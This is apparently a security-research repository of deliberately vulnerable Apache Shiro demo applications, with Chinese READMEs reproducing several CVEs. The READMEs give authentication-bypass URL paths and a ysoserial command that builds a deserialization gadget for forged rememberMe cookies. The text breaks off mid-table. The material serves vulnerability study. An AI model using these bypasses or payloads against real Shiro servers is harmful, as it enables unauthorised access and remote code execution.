├── .gitignore ├── shiro-721 ├── target │ ├── .plxarc │ ├── jacoco-it.exec │ ├── samples-web-1.4.1.war │ ├── maven-status │ │ └── maven-compiler-plugin │ │ │ └── testCompile │ │ │ └── default-testCompile │ │ │ ├── createdFiles.lst │ │ │ └── inputFiles.lst │ ├── maven-archiver │ │ └── pom.properties │ ├── samples-web-1.4.1 │ │ ├── WEB-INF │ │ │ ├── lib │ │ │ │ ├── jstl-1.2.jar │ │ │ │ ├── log4j-1.2.17.jar │ │ │ │ ├── shiro-core-1.4.1.jar │ │ │ │ ├── shiro-lang-1.4.1.jar │ │ │ │ ├── shiro-web-1.4.1.jar │ │ │ │ ├── slf4j-api-1.7.21.jar │ │ │ │ ├── commons-codec-1.10.jar │ │ │ │ ├── shiro-cache-1.4.1.jar │ │ │ │ ├── shiro-event-1.4.1.jar │ │ │ │ ├── jcl-over-slf4j-1.7.21.jar │ │ │ │ ├── slf4j-log4j12-1.7.21.jar │ │ │ │ ├── commons-beanutils-1.9.3.jar │ │ │ │ ├── shiro-config-core-1.4.1.jar │ │ │ │ ├── shiro-config-ogdl-1.4.1.jar │ │ │ │ ├── shiro-crypto-core-1.4.1.jar │ │ │ │ ├── shiro-crypto-hash-1.4.1.jar │ │ │ │ ├── commons-collections-3.2.2.jar │ │ │ │ └── shiro-crypto-cipher-1.4.1.jar │ │ │ ├── classes │ │ │ │ ├── META-INF │ │ │ │ │ ├── NOTICE │ │ │ │ │ ├── DEPENDENCIES │ │ │ │ │ └── LICENSE │ │ │ │ └── log4j.properties │ │ │ ├── web.xml │ │ │ └── shiro.ini │ │ ├── index.jsp │ │ ├── include.jsp │ │ ├── logout.jsp │ │ ├── account │ │ │ └── index.jsp │ │ ├── style.css │ │ ├── home.jsp │ │ └── login.jsp │ ├── test-classes │ │ ├── org │ │ │ └── apache │ │ │ │ └── shiro │ │ │ │ └── test │ │ │ │ └── ContainerIntegrationIT.class │ │ └── META-INF │ │ │ ├── NOTICE │ │ │ ├── DEPENDENCIES │ │ │ └── LICENSE │ ├── classes │ │ ├── META-INF │ │ │ ├── NOTICE │ │ │ ├── DEPENDENCIES │ │ │ └── LICENSE │ │ └── log4j.properties │ ├── maven-shared-archive-resources │ │ └── META-INF │ │ │ ├── NOTICE │ │ │ ├── DEPENDENCIES │ │ │ └── LICENSE │ └── failsafe-reports │ │ ├── org.apache.shiro.test.ContainerIntegrationIT.txt │ │ ├── failsafe-summary.xml │ │ └── TEST-org.apache.shiro.test.ContainerIntegrationIT.xml ├── 20210630171858.jpg ├── src │ ├── main │ │ ├── webapp │ │ │ ├── index.jsp │ │ 
│ ├── include.jsp │ │ │ ├── logout.jsp │ │ │ ├── account │ │ │ │ └── index.jsp │ │ │ ├── style.css │ │ │ ├── WEB-INF │ │ │ │ ├── web.xml │ │ │ │ └── shiro.ini │ │ │ ├── home.jsp │ │ │ └── login.jsp │ │ └── resources │ │ │ └── log4j.properties │ └── test │ │ └── java │ │ └── org │ │ └── apache │ │ └── shiro │ │ └── test │ │ └── ContainerIntegrationIT.java ├── README.md └── pom.xml ├── shiro_cve-2020-17510 ├── src │ └── main │ │ ├── resources │ │ └── application.properties │ │ └── java │ │ └── com │ │ └── l4g │ │ └── springshiro │ │ ├── SpringShiroApplication.java │ │ ├── MyRealm.java │ │ ├── controllers │ │ └── LoginController.java │ │ └── config │ │ └── ShiroConfig.java ├── README.md └── pom.xml ├── shiro_cve-2020-11989 ├── src │ ├── main │ │ ├── resources │ │ │ └── application.properties │ │ └── java │ │ │ └── org │ │ │ └── syclover │ │ │ └── srpingbootshiro │ │ │ ├── SrpingbootShiroApplication.java │ │ │ ├── MyRealm.java │ │ │ ├── LoginController.java │ │ │ └── ShiroConfig.java │ └── test │ │ └── java │ │ └── org │ │ └── syclover │ │ └── srpingbootshiro │ │ └── SrpingbootShiroApplicationTests.java ├── image-20210128172206395.png ├── image-20210128172253231.png ├── README.md └── pom.xml ├── shiro_cve-2020-13933 ├── src │ ├── main │ │ ├── resources │ │ │ └── application.properties │ │ └── java │ │ │ └── org │ │ │ └── test │ │ │ └── springbootshiro │ │ │ ├── SrpingbootShiroApplication.java │ │ │ ├── MyRealm.java │ │ │ ├── LoginController.java │ │ │ └── ShiroConfig.java │ └── test │ │ └── java │ │ └── org │ │ └── test │ │ └── springbootshiro │ │ └── SrpingbootShiroApplicationTests.java ├── image-20210128175855632.png ├── image-20210128175913047.png ├── README.md └── pom.xml ├── shiro_cve-2020-1957 ├── src │ ├── main │ │ ├── resources │ │ │ └── application.properties │ │ └── java │ │ │ └── org │ │ │ └── javaboy │ │ │ └── shirobasic │ │ │ ├── ShiroBasicApplication.java │ │ │ ├── MyRealm.java │ │ │ ├── LoginController.java │ │ │ └── ShiroConfig.java │ └── test │ │ └── 
java │ │ └── org │ │ └── javaboy │ │ └── shirobasic │ │ └── ShiroBasicApplicationTests.java ├── image-20210128161242932.png ├── image-20210128161322861.png ├── README.md └── pom.xml ├── shiro_cve-2020-17523 ├── src │ ├── main │ │ ├── resources │ │ │ └── application.properties │ │ └── java │ │ │ └── org │ │ │ └── test │ │ │ └── springbootshiro │ │ │ ├── MyRealm.java │ │ │ ├── LoginController.java │ │ │ ├── ShiroConfig.java │ │ │ └── SpringbootShiroApplication.java │ └── test │ │ └── java │ │ └── org │ │ └── test │ │ └── springbootshiro │ │ └── SrpingbootShiroApplicationTests.java ├── image-20210208145249325.png ├── image-20210208145354757.png ├── image-20210208145429278.png ├── README.md └── pom.xml ├── shiro-550 ├── image1.PNG ├── src │ ├── main │ │ ├── resources │ │ │ ├── application.properties │ │ │ └── templates │ │ │ │ ├── error.html │ │ │ │ ├── test.html │ │ │ │ ├── hello.html │ │ │ │ └── login.html │ │ └── java │ │ │ └── com │ │ │ └── example │ │ │ └── shiro550 │ │ │ ├── Shiro550Application.java │ │ │ ├── shiro │ │ │ ├── MainRealm.java │ │ │ └── ShiroConfig.java │ │ │ ├── DemoController.java │ │ │ └── exp │ │ │ └── GenPayload.java │ └── test │ │ └── java │ │ └── com │ │ └── example │ │ └── shiro550 │ │ └── Shiro550ApplicationTests.java ├── .gitignore ├── README.md └── pom.xml └── README.md /.gitignore: -------------------------------------------------------------------------------- 1 | .idea 2 | *.iml -------------------------------------------------------------------------------- /shiro-721/target/.plxarc: -------------------------------------------------------------------------------- 1 | maven-shared-archive-resources -------------------------------------------------------------------------------- /shiro_cve-2020-17510/src/main/resources/application.properties: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- 
/shiro_cve-2020-11989/src/main/resources/application.properties: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /shiro_cve-2020-13933/src/main/resources/application.properties: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /shiro_cve-2020-1957/src/main/resources/application.properties: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /shiro_cve-2020-17523/src/main/resources/application.properties: -------------------------------------------------------------------------------- 1 | server.port=9090 -------------------------------------------------------------------------------- /shiro-550/image1.PNG: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xhycccc/Shiro-Vuln-Demo/HEAD/shiro-550/image1.PNG -------------------------------------------------------------------------------- /shiro-721/20210630171858.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xhycccc/Shiro-Vuln-Demo/HEAD/shiro-721/20210630171858.jpg -------------------------------------------------------------------------------- /shiro-721/target/jacoco-it.exec: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xhycccc/Shiro-Vuln-Demo/HEAD/shiro-721/target/jacoco-it.exec -------------------------------------------------------------------------------- /shiro-721/target/samples-web-1.4.1.war: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/xhycccc/Shiro-Vuln-Demo/HEAD/shiro-721/target/samples-web-1.4.1.war -------------------------------------------------------------------------------- /shiro-550/src/main/resources/application.properties: -------------------------------------------------------------------------------- 1 | # 应用名称 2 | spring.application.name=shiro-550 3 | # 应用服务 WEB 访问端口 4 | server.port=8080 5 | 6 | 7 | -------------------------------------------------------------------------------- /shiro_cve-2020-1957/image-20210128161242932.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xhycccc/Shiro-Vuln-Demo/HEAD/shiro_cve-2020-1957/image-20210128161242932.png -------------------------------------------------------------------------------- /shiro_cve-2020-1957/image-20210128161322861.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xhycccc/Shiro-Vuln-Demo/HEAD/shiro_cve-2020-1957/image-20210128161322861.png -------------------------------------------------------------------------------- /shiro-721/target/maven-status/maven-compiler-plugin/testCompile/default-testCompile/createdFiles.lst: -------------------------------------------------------------------------------- 1 | org\apache\shiro\test\ContainerIntegrationIT.class 2 | -------------------------------------------------------------------------------- /shiro_cve-2020-11989/image-20210128172206395.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xhycccc/Shiro-Vuln-Demo/HEAD/shiro_cve-2020-11989/image-20210128172206395.png -------------------------------------------------------------------------------- /shiro_cve-2020-11989/image-20210128172253231.png: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/xhycccc/Shiro-Vuln-Demo/HEAD/shiro_cve-2020-11989/image-20210128172253231.png -------------------------------------------------------------------------------- /shiro_cve-2020-13933/image-20210128175855632.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xhycccc/Shiro-Vuln-Demo/HEAD/shiro_cve-2020-13933/image-20210128175855632.png -------------------------------------------------------------------------------- /shiro_cve-2020-13933/image-20210128175913047.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xhycccc/Shiro-Vuln-Demo/HEAD/shiro_cve-2020-13933/image-20210128175913047.png -------------------------------------------------------------------------------- /shiro_cve-2020-17523/image-20210208145249325.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xhycccc/Shiro-Vuln-Demo/HEAD/shiro_cve-2020-17523/image-20210208145249325.png -------------------------------------------------------------------------------- /shiro_cve-2020-17523/image-20210208145354757.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xhycccc/Shiro-Vuln-Demo/HEAD/shiro_cve-2020-17523/image-20210208145354757.png -------------------------------------------------------------------------------- /shiro_cve-2020-17523/image-20210208145429278.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xhycccc/Shiro-Vuln-Demo/HEAD/shiro_cve-2020-17523/image-20210208145429278.png -------------------------------------------------------------------------------- /shiro-721/target/maven-archiver/pom.properties: -------------------------------------------------------------------------------- 1 | #Created by Apache Maven 3.6.3 2 | 
version=1.4.1 3 | groupId=org.apache.shiro.samples 4 | artifactId=samples-web 5 | -------------------------------------------------------------------------------- /shiro-721/target/samples-web-1.4.1/WEB-INF/lib/jstl-1.2.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xhycccc/Shiro-Vuln-Demo/HEAD/shiro-721/target/samples-web-1.4.1/WEB-INF/lib/jstl-1.2.jar -------------------------------------------------------------------------------- /shiro-721/target/samples-web-1.4.1/WEB-INF/lib/log4j-1.2.17.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xhycccc/Shiro-Vuln-Demo/HEAD/shiro-721/target/samples-web-1.4.1/WEB-INF/lib/log4j-1.2.17.jar -------------------------------------------------------------------------------- /shiro-721/target/samples-web-1.4.1/WEB-INF/lib/shiro-core-1.4.1.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xhycccc/Shiro-Vuln-Demo/HEAD/shiro-721/target/samples-web-1.4.1/WEB-INF/lib/shiro-core-1.4.1.jar -------------------------------------------------------------------------------- /shiro-721/target/samples-web-1.4.1/WEB-INF/lib/shiro-lang-1.4.1.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xhycccc/Shiro-Vuln-Demo/HEAD/shiro-721/target/samples-web-1.4.1/WEB-INF/lib/shiro-lang-1.4.1.jar -------------------------------------------------------------------------------- /shiro-721/target/samples-web-1.4.1/WEB-INF/lib/shiro-web-1.4.1.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xhycccc/Shiro-Vuln-Demo/HEAD/shiro-721/target/samples-web-1.4.1/WEB-INF/lib/shiro-web-1.4.1.jar -------------------------------------------------------------------------------- 
/shiro-721/target/samples-web-1.4.1/WEB-INF/lib/slf4j-api-1.7.21.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xhycccc/Shiro-Vuln-Demo/HEAD/shiro-721/target/samples-web-1.4.1/WEB-INF/lib/slf4j-api-1.7.21.jar -------------------------------------------------------------------------------- /shiro-721/target/samples-web-1.4.1/WEB-INF/lib/commons-codec-1.10.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xhycccc/Shiro-Vuln-Demo/HEAD/shiro-721/target/samples-web-1.4.1/WEB-INF/lib/commons-codec-1.10.jar -------------------------------------------------------------------------------- /shiro-721/target/samples-web-1.4.1/WEB-INF/lib/shiro-cache-1.4.1.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xhycccc/Shiro-Vuln-Demo/HEAD/shiro-721/target/samples-web-1.4.1/WEB-INF/lib/shiro-cache-1.4.1.jar -------------------------------------------------------------------------------- /shiro-721/target/samples-web-1.4.1/WEB-INF/lib/shiro-event-1.4.1.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xhycccc/Shiro-Vuln-Demo/HEAD/shiro-721/target/samples-web-1.4.1/WEB-INF/lib/shiro-event-1.4.1.jar -------------------------------------------------------------------------------- /shiro-721/target/samples-web-1.4.1/WEB-INF/lib/jcl-over-slf4j-1.7.21.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xhycccc/Shiro-Vuln-Demo/HEAD/shiro-721/target/samples-web-1.4.1/WEB-INF/lib/jcl-over-slf4j-1.7.21.jar -------------------------------------------------------------------------------- /shiro-721/target/samples-web-1.4.1/WEB-INF/lib/slf4j-log4j12-1.7.21.jar: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/xhycccc/Shiro-Vuln-Demo/HEAD/shiro-721/target/samples-web-1.4.1/WEB-INF/lib/slf4j-log4j12-1.7.21.jar -------------------------------------------------------------------------------- /shiro-721/target/samples-web-1.4.1/WEB-INF/lib/commons-beanutils-1.9.3.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xhycccc/Shiro-Vuln-Demo/HEAD/shiro-721/target/samples-web-1.4.1/WEB-INF/lib/commons-beanutils-1.9.3.jar -------------------------------------------------------------------------------- /shiro-721/target/samples-web-1.4.1/WEB-INF/lib/shiro-config-core-1.4.1.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xhycccc/Shiro-Vuln-Demo/HEAD/shiro-721/target/samples-web-1.4.1/WEB-INF/lib/shiro-config-core-1.4.1.jar -------------------------------------------------------------------------------- /shiro-721/target/samples-web-1.4.1/WEB-INF/lib/shiro-config-ogdl-1.4.1.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xhycccc/Shiro-Vuln-Demo/HEAD/shiro-721/target/samples-web-1.4.1/WEB-INF/lib/shiro-config-ogdl-1.4.1.jar -------------------------------------------------------------------------------- /shiro-721/target/samples-web-1.4.1/WEB-INF/lib/shiro-crypto-core-1.4.1.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xhycccc/Shiro-Vuln-Demo/HEAD/shiro-721/target/samples-web-1.4.1/WEB-INF/lib/shiro-crypto-core-1.4.1.jar -------------------------------------------------------------------------------- /shiro-721/target/samples-web-1.4.1/WEB-INF/lib/shiro-crypto-hash-1.4.1.jar: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/xhycccc/Shiro-Vuln-Demo/HEAD/shiro-721/target/samples-web-1.4.1/WEB-INF/lib/shiro-crypto-hash-1.4.1.jar -------------------------------------------------------------------------------- /shiro-721/target/maven-status/maven-compiler-plugin/testCompile/default-testCompile/inputFiles.lst: -------------------------------------------------------------------------------- 1 | C:\Users\admin\Downloads\shiro\samples\web\src\test\java\org\apache\shiro\test\ContainerIntegrationIT.java 2 | -------------------------------------------------------------------------------- /shiro-721/target/samples-web-1.4.1/WEB-INF/lib/commons-collections-3.2.2.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xhycccc/Shiro-Vuln-Demo/HEAD/shiro-721/target/samples-web-1.4.1/WEB-INF/lib/commons-collections-3.2.2.jar -------------------------------------------------------------------------------- /shiro-721/target/samples-web-1.4.1/WEB-INF/lib/shiro-crypto-cipher-1.4.1.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xhycccc/Shiro-Vuln-Demo/HEAD/shiro-721/target/samples-web-1.4.1/WEB-INF/lib/shiro-crypto-cipher-1.4.1.jar -------------------------------------------------------------------------------- /shiro-721/target/test-classes/org/apache/shiro/test/ContainerIntegrationIT.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xhycccc/Shiro-Vuln-Demo/HEAD/shiro-721/target/test-classes/org/apache/shiro/test/ContainerIntegrationIT.class -------------------------------------------------------------------------------- /shiro-550/src/main/resources/templates/error.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | Error 6 | 7 | 8 |

error

9 | 10 | -------------------------------------------------------------------------------- /shiro-550/src/main/resources/templates/test.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | Title 6 | 7 | 8 |

test thymeleaf

9 | 10 | -------------------------------------------------------------------------------- /shiro-550/src/main/resources/templates/hello.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | Hello 6 | 7 | 8 |

Login success.

9 | 10 | -------------------------------------------------------------------------------- /shiro-721/target/classes/META-INF/NOTICE: -------------------------------------------------------------------------------- 1 | 2 | Apache Shiro :: Samples :: Web 3 | Copyright 2004-2021 The Apache Software Foundation 4 | 5 | This product includes software developed at 6 | The Apache Software Foundation (http://www.apache.org/). 7 | 8 | 9 | -------------------------------------------------------------------------------- /shiro-721/target/test-classes/META-INF/NOTICE: -------------------------------------------------------------------------------- 1 | 2 | Apache Shiro :: Samples :: Web 3 | Copyright 2004-2021 The Apache Software Foundation 4 | 5 | This product includes software developed at 6 | The Apache Software Foundation (http://www.apache.org/). 7 | 8 | 9 | -------------------------------------------------------------------------------- /shiro-721/target/maven-shared-archive-resources/META-INF/NOTICE: -------------------------------------------------------------------------------- 1 | 2 | Apache Shiro :: Samples :: Web 3 | Copyright 2004-2021 The Apache Software Foundation 4 | 5 | This product includes software developed at 6 | The Apache Software Foundation (http://www.apache.org/). 7 | 8 | 9 | -------------------------------------------------------------------------------- /shiro-721/target/samples-web-1.4.1/WEB-INF/classes/META-INF/NOTICE: -------------------------------------------------------------------------------- 1 | 2 | Apache Shiro :: Samples :: Web 3 | Copyright 2004-2021 The Apache Software Foundation 4 | 5 | This product includes software developed at 6 | The Apache Software Foundation (http://www.apache.org/). 
7 | 8 | 9 | -------------------------------------------------------------------------------- /shiro_cve-2020-17510/README.md: -------------------------------------------------------------------------------- 1 | # Shiro 权限绕过漏洞(CVE-2020-17510) 2 | 3 | ### 漏洞描述 4 | 5 | 由于Shiro在处理url时与Spring存在差异,在使用Apache Shiro与Spring时,远程攻击者可以发送特制的HTTP请求,绕过身份验证过程并获得对应用程序的未授权访问。 6 | 7 | ### 漏洞复现 8 | 9 | 暂无POC 10 | 11 | ### 参考链接 12 | 13 | * https://github.com/plr47/VulRecurrence-JAVA/tree/main/CVE-2020-17510 -------------------------------------------------------------------------------- /shiro-550/src/test/java/com/example/shiro550/Shiro550ApplicationTests.java: -------------------------------------------------------------------------------- 1 | package com.example.shiro550; 2 | 3 | import org.junit.jupiter.api.Test; 4 | import org.springframework.boot.test.context.SpringBootTest; 5 | 6 | @SpringBootTest 7 | class Shiro550ApplicationTests { 8 | 9 | @Test 10 | void contextLoads() { 11 | } 12 | 13 | } 14 | -------------------------------------------------------------------------------- /shiro_cve-2020-13933/src/test/java/org/test/springbootshiro/SrpingbootShiroApplicationTests.java: -------------------------------------------------------------------------------- 1 | package org.test.springbootshiro; 2 | 3 | import org.junit.jupiter.api.Test; 4 | import org.springframework.boot.test.context.SpringBootTest; 5 | 6 | @SpringBootTest 7 | class SrpingbootShiroApplicationTests { 8 | 9 | @Test 10 | void contextLoads() { 11 | } 12 | 13 | } 14 | -------------------------------------------------------------------------------- /shiro_cve-2020-17523/src/test/java/org/test/springbootshiro/SrpingbootShiroApplicationTests.java: -------------------------------------------------------------------------------- 1 | package org.test.springbootshiro; 2 | 3 | import org.junit.jupiter.api.Test; 4 | import org.springframework.boot.test.context.SpringBootTest; 5 | 6 | @SpringBootTest 7 | class 
SrpingbootShiroApplicationTests { 8 | 9 | @Test 10 | void contextLoads() { 11 | } 12 | 13 | } 14 | -------------------------------------------------------------------------------- /shiro_cve-2020-11989/src/test/java/org/syclover/srpingbootshiro/SrpingbootShiroApplicationTests.java: -------------------------------------------------------------------------------- 1 | package org.syclover.srpingbootshiro; 2 | 3 | import org.junit.jupiter.api.Test; 4 | import org.springframework.boot.test.context.SpringBootTest; 5 | 6 | @SpringBootTest 7 | class SrpingbootShiroApplicationTests { 8 | 9 | @Test 10 | void contextLoads() { 11 | } 12 | 13 | } 14 | -------------------------------------------------------------------------------- /shiro-721/target/failsafe-reports/org.apache.shiro.test.ContainerIntegrationIT.txt: -------------------------------------------------------------------------------- 1 | ------------------------------------------------------------------------------- 2 | Test set: org.apache.shiro.test.ContainerIntegrationIT 3 | ------------------------------------------------------------------------------- 4 | Tests run: 1, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 10.956 s - in org.apache.shiro.test.ContainerIntegrationIT 5 | -------------------------------------------------------------------------------- /shiro-550/src/main/java/com/example/shiro550/Shiro550Application.java: -------------------------------------------------------------------------------- 1 | package com.example.shiro550; 2 | 3 | import org.springframework.boot.SpringApplication; 4 | import org.springframework.boot.autoconfigure.SpringBootApplication; 5 | 6 | @SpringBootApplication 7 | public class Shiro550Application { 8 | 9 | public static void main(String[] args) { 10 | SpringApplication.run(Shiro550Application.class, args); 11 | } 12 | 13 | } 14 | -------------------------------------------------------------------------------- 
/shiro_cve-2020-17510/src/main/java/com/l4g/springshiro/SpringShiroApplication.java: -------------------------------------------------------------------------------- 1 | package com.l4g.springshiro; 2 | 3 | import org.springframework.boot.SpringApplication; 4 | import org.springframework.boot.autoconfigure.SpringBootApplication; 5 | 6 | @SpringBootApplication 7 | public class SpringShiroApplication { 8 | 9 | public static void main(String[] args) { 10 | SpringApplication.run(SpringShiroApplication.class, args); 11 | } 12 | 13 | } 14 | -------------------------------------------------------------------------------- /shiro_cve-2020-1957/src/main/java/org/javaboy/shirobasic/ShiroBasicApplication.java: -------------------------------------------------------------------------------- 1 | package org.javaboy.shirobasic; 2 | 3 | import org.springframework.boot.SpringApplication; 4 | import org.springframework.boot.autoconfigure.SpringBootApplication; 5 | 6 | @SpringBootApplication 7 | public class ShiroBasicApplication { 8 | 9 | public static void main(String[] args) { 10 | SpringApplication.run(ShiroBasicApplication.class, args); 11 | } 12 | 13 | } 14 | -------------------------------------------------------------------------------- /shiro-550/.gitignore: -------------------------------------------------------------------------------- 1 | HELP.md 2 | target/ 3 | !.mvn/wrapper/maven-wrapper.jar 4 | !**/src/main/** 5 | !**/src/test/** 6 | 7 | ### STS ### 8 | .apt_generated 9 | .classpath 10 | .factorypath 11 | .project 12 | .settings 13 | .springBeans 14 | .sts4-cache 15 | 16 | ### IntelliJ IDEA ### 17 | .idea 18 | *.iws 19 | *.iml 20 | *.ipr 21 | 22 | ### NetBeans ### 23 | /nbproject/private/ 24 | /nbbuild/ 25 | /dist/ 26 | /nbdist/ 27 | /.nb-gradle/ 28 | build/ 29 | 30 | ### VS Code ### 31 | .vscode/ 32 | -------------------------------------------------------------------------------- 
/shiro_cve-2020-1957/src/test/java/org/javaboy/shirobasic/ShiroBasicApplicationTests.java: -------------------------------------------------------------------------------- 1 | package org.javaboy.shirobasic; 2 | 3 | import org.junit.Test; 4 | import org.junit.runner.RunWith; 5 | import org.springframework.boot.test.context.SpringBootTest; 6 | import org.springframework.test.context.junit4.SpringRunner; 7 | 8 | @RunWith(SpringRunner.class) 9 | @SpringBootTest 10 | public class ShiroBasicApplicationTests { 11 | 12 | @Test 13 | public void contextLoads() { 14 | } 15 | 16 | } 17 | -------------------------------------------------------------------------------- /shiro-721/target/failsafe-reports/failsafe-summary.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 1 4 | 0 5 | 0 6 | 0 7 | 8 | -------------------------------------------------------------------------------- /shiro_cve-2020-13933/README.md: -------------------------------------------------------------------------------- 1 | # Shiro 权限绕过漏洞(CVE-2020-13933) 2 | 3 | ### 漏洞描述 4 | 5 | Apache Shiro 的 CVE-2020-11989 修补补丁依旧存在缺陷,由于Shiro和Spring在处理URL时仍然存在差异,通过构造特殊的HTTP请求,可以再次绕过授权,访问未授权的信息。 6 | 7 | 影响范围: 8 | 9 | * Shiro < 1.6.0 10 | 11 | ### 漏洞复现 12 | 13 | 访问`/admin/page`接口,可以看到被`authc`拦截器拦截了,将会跳转到登录接口进行登录。 14 | 15 | image-20210128175913047 16 | 17 | 访问`/admin/%3bpage`,成功绕过`authc`拦截器,获取到了资源。 18 | 19 | image-20210128175855632 20 | 21 | ### 参考链接 22 | 23 | * [Apache shiro安全漏洞(CVE-2020-13933)分析](https://xz.aliyun.com/t/8230) -------------------------------------------------------------------------------- /shiro-550/README.md: -------------------------------------------------------------------------------- 1 | # Shiro-550 RememberMe反序列化漏洞(CVE-2016-4437) 2 | 3 | ### 漏洞描述 4 | 5 | Apache Shiro默认使用了`CookieRememberMeManager`,其处理cookie的流程是:得到rememberMe的cookie值 → Base64解码 → AES解密 → 反序列化。因AES密钥硬编码在代码中,攻击者可以用同一密钥加密自行构造的序列化数据,服务端解密后对其反序列化,从而造成RCE漏洞。 6 | 7 | ### 漏洞复现 8 | 9 | 使用ysoserial生成CommonsBeanutils1的Gadget: 
10 | 11 | ```bash 12 | java -jar ysoserial-master-30099844c6-1.jar CommonsBeanutils1 "calc.exe" > poc.ser 13 | ``` 14 | 15 | 运行`GenPayload.java`生成加密后的Payload,放入Cookie中的rememberMe字段发送即可: 16 | 17 | ![image1](image1.PNG) 18 | 19 | ### 参考链接 20 | 21 | * [shiro550反序列化分析](https://www.cnblogs.com/twosmi1e/p/14279403.html) 22 | 23 | * [Apache Shiro 1.2.4反序列化漏洞(CVE-2016-4437)](https://vulhub.org/#/environments/shiro/CVE-2016-4437/) -------------------------------------------------------------------------------- /shiro_cve-2020-13933/src/main/java/org/test/springbootshiro/SrpingbootShiroApplication.java: -------------------------------------------------------------------------------- 1 | package org.test.springbootshiro; 2 | 3 | import org.springframework.boot.SpringApplication; 4 | import org.springframework.boot.autoconfigure.SpringBootApplication; 5 | import org.springframework.boot.builder.SpringApplicationBuilder; 6 | import org.springframework.boot.web.servlet.support.SpringBootServletInitializer; 7 | 8 | @SpringBootApplication 9 | public class SrpingbootShiroApplication extends SpringBootServletInitializer { 10 | 11 | @Override 12 | protected SpringApplicationBuilder configure(SpringApplicationBuilder builder) { 13 | return builder.sources(SrpingbootShiroApplication.class); 14 | } 15 | 16 | public static void main(String[] args) { 17 | 18 | SpringApplication.run(SrpingbootShiroApplication.class, args); 19 | } 20 | 21 | } 22 | -------------------------------------------------------------------------------- /shiro_cve-2020-1957/README.md: -------------------------------------------------------------------------------- 1 | # Shiro 权限绕过漏洞(CVE-2020-1957) 2 | 3 | ### 漏洞描述 4 | 5 | 当Shiro和 Spring 结合使用时,在一定权限匹配规则下,攻击者可通过构造特殊的 HTTP 请求包完成身份认证绕过。 6 | 7 | 影响版本:Shiro < 1.5.2 8 | 9 | ### 漏洞复现 10 | 11 | 访问`/hello/123`接口,可以看到被`authc`拦截器拦截了,将会跳转到登录接口进行登录。 12 | 13 | image-20210128161322861 14 | 15 | 访问`/hello/123/`,成功绕过`authc`拦截器,获取到了资源。 16 | 17 | image-20210128161242932 18 | 19 | ### 
参考链接 20 | 21 | * [Shiro 权限绕过漏洞(CVE-2020-1957)复现](https://blog.csdn.net/xuandao_ahfengren/article/details/108218864) 22 | * [CVE-2020-1957 shiro权限绕过漏洞分析](https://blog.csdn.net/qq_22807425/article/details/108283839) 23 | * [Shiro 权限绕过漏洞分析(CVE-2020-1957)](https://blog.riskivy.com/shiro-%E6%9D%83%E9%99%90%E7%BB%95%E8%BF%87%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90%EF%BC%88cve-2020-1957%EF%BC%89/) -------------------------------------------------------------------------------- /shiro_cve-2020-17510/src/main/java/com/l4g/springshiro/MyRealm.java: -------------------------------------------------------------------------------- 1 | package com.l4g.springshiro; 2 | 3 | import org.apache.shiro.authc.*; 4 | import org.apache.shiro.authz.AuthorizationInfo; 5 | import org.apache.shiro.realm.AuthorizingRealm; 6 | import org.apache.shiro.subject.PrincipalCollection; 7 | 8 | public class MyRealm extends AuthorizingRealm { 9 | @Override 10 | protected AuthorizationInfo doGetAuthorizationInfo(PrincipalCollection principals) { 11 | return null; 12 | } 13 | @Override 14 | protected AuthenticationInfo doGetAuthenticationInfo(AuthenticationToken token) throws AuthenticationException { 15 | String username = (String) token.getPrincipal(); 16 | if (!"admin".equals(username)) { 17 | throw new UnknownAccountException("账户不存在!"); 18 | } 19 | return new SimpleAuthenticationInfo(username, "123456", getName()); 20 | } 21 | } 22 | -------------------------------------------------------------------------------- /shiro_cve-2020-11989/README.md: -------------------------------------------------------------------------------- 1 | # Shiro 权限绕过漏洞(CVE-2020-11989) 2 | 3 | ### 漏洞描述 4 | 5 | 当Shiro和 Spring 结合使用时,在一定权限匹配规则下,攻击者可通过构造特殊的 HTTP 请求包完成身份认证绕过。 6 | 7 | 影响范围: 8 | 9 | * Shiro < 1.5.3 10 | 11 | ### 漏洞复现 12 | 13 | 环境 14 | 15 | | Shiro Version | Shiro 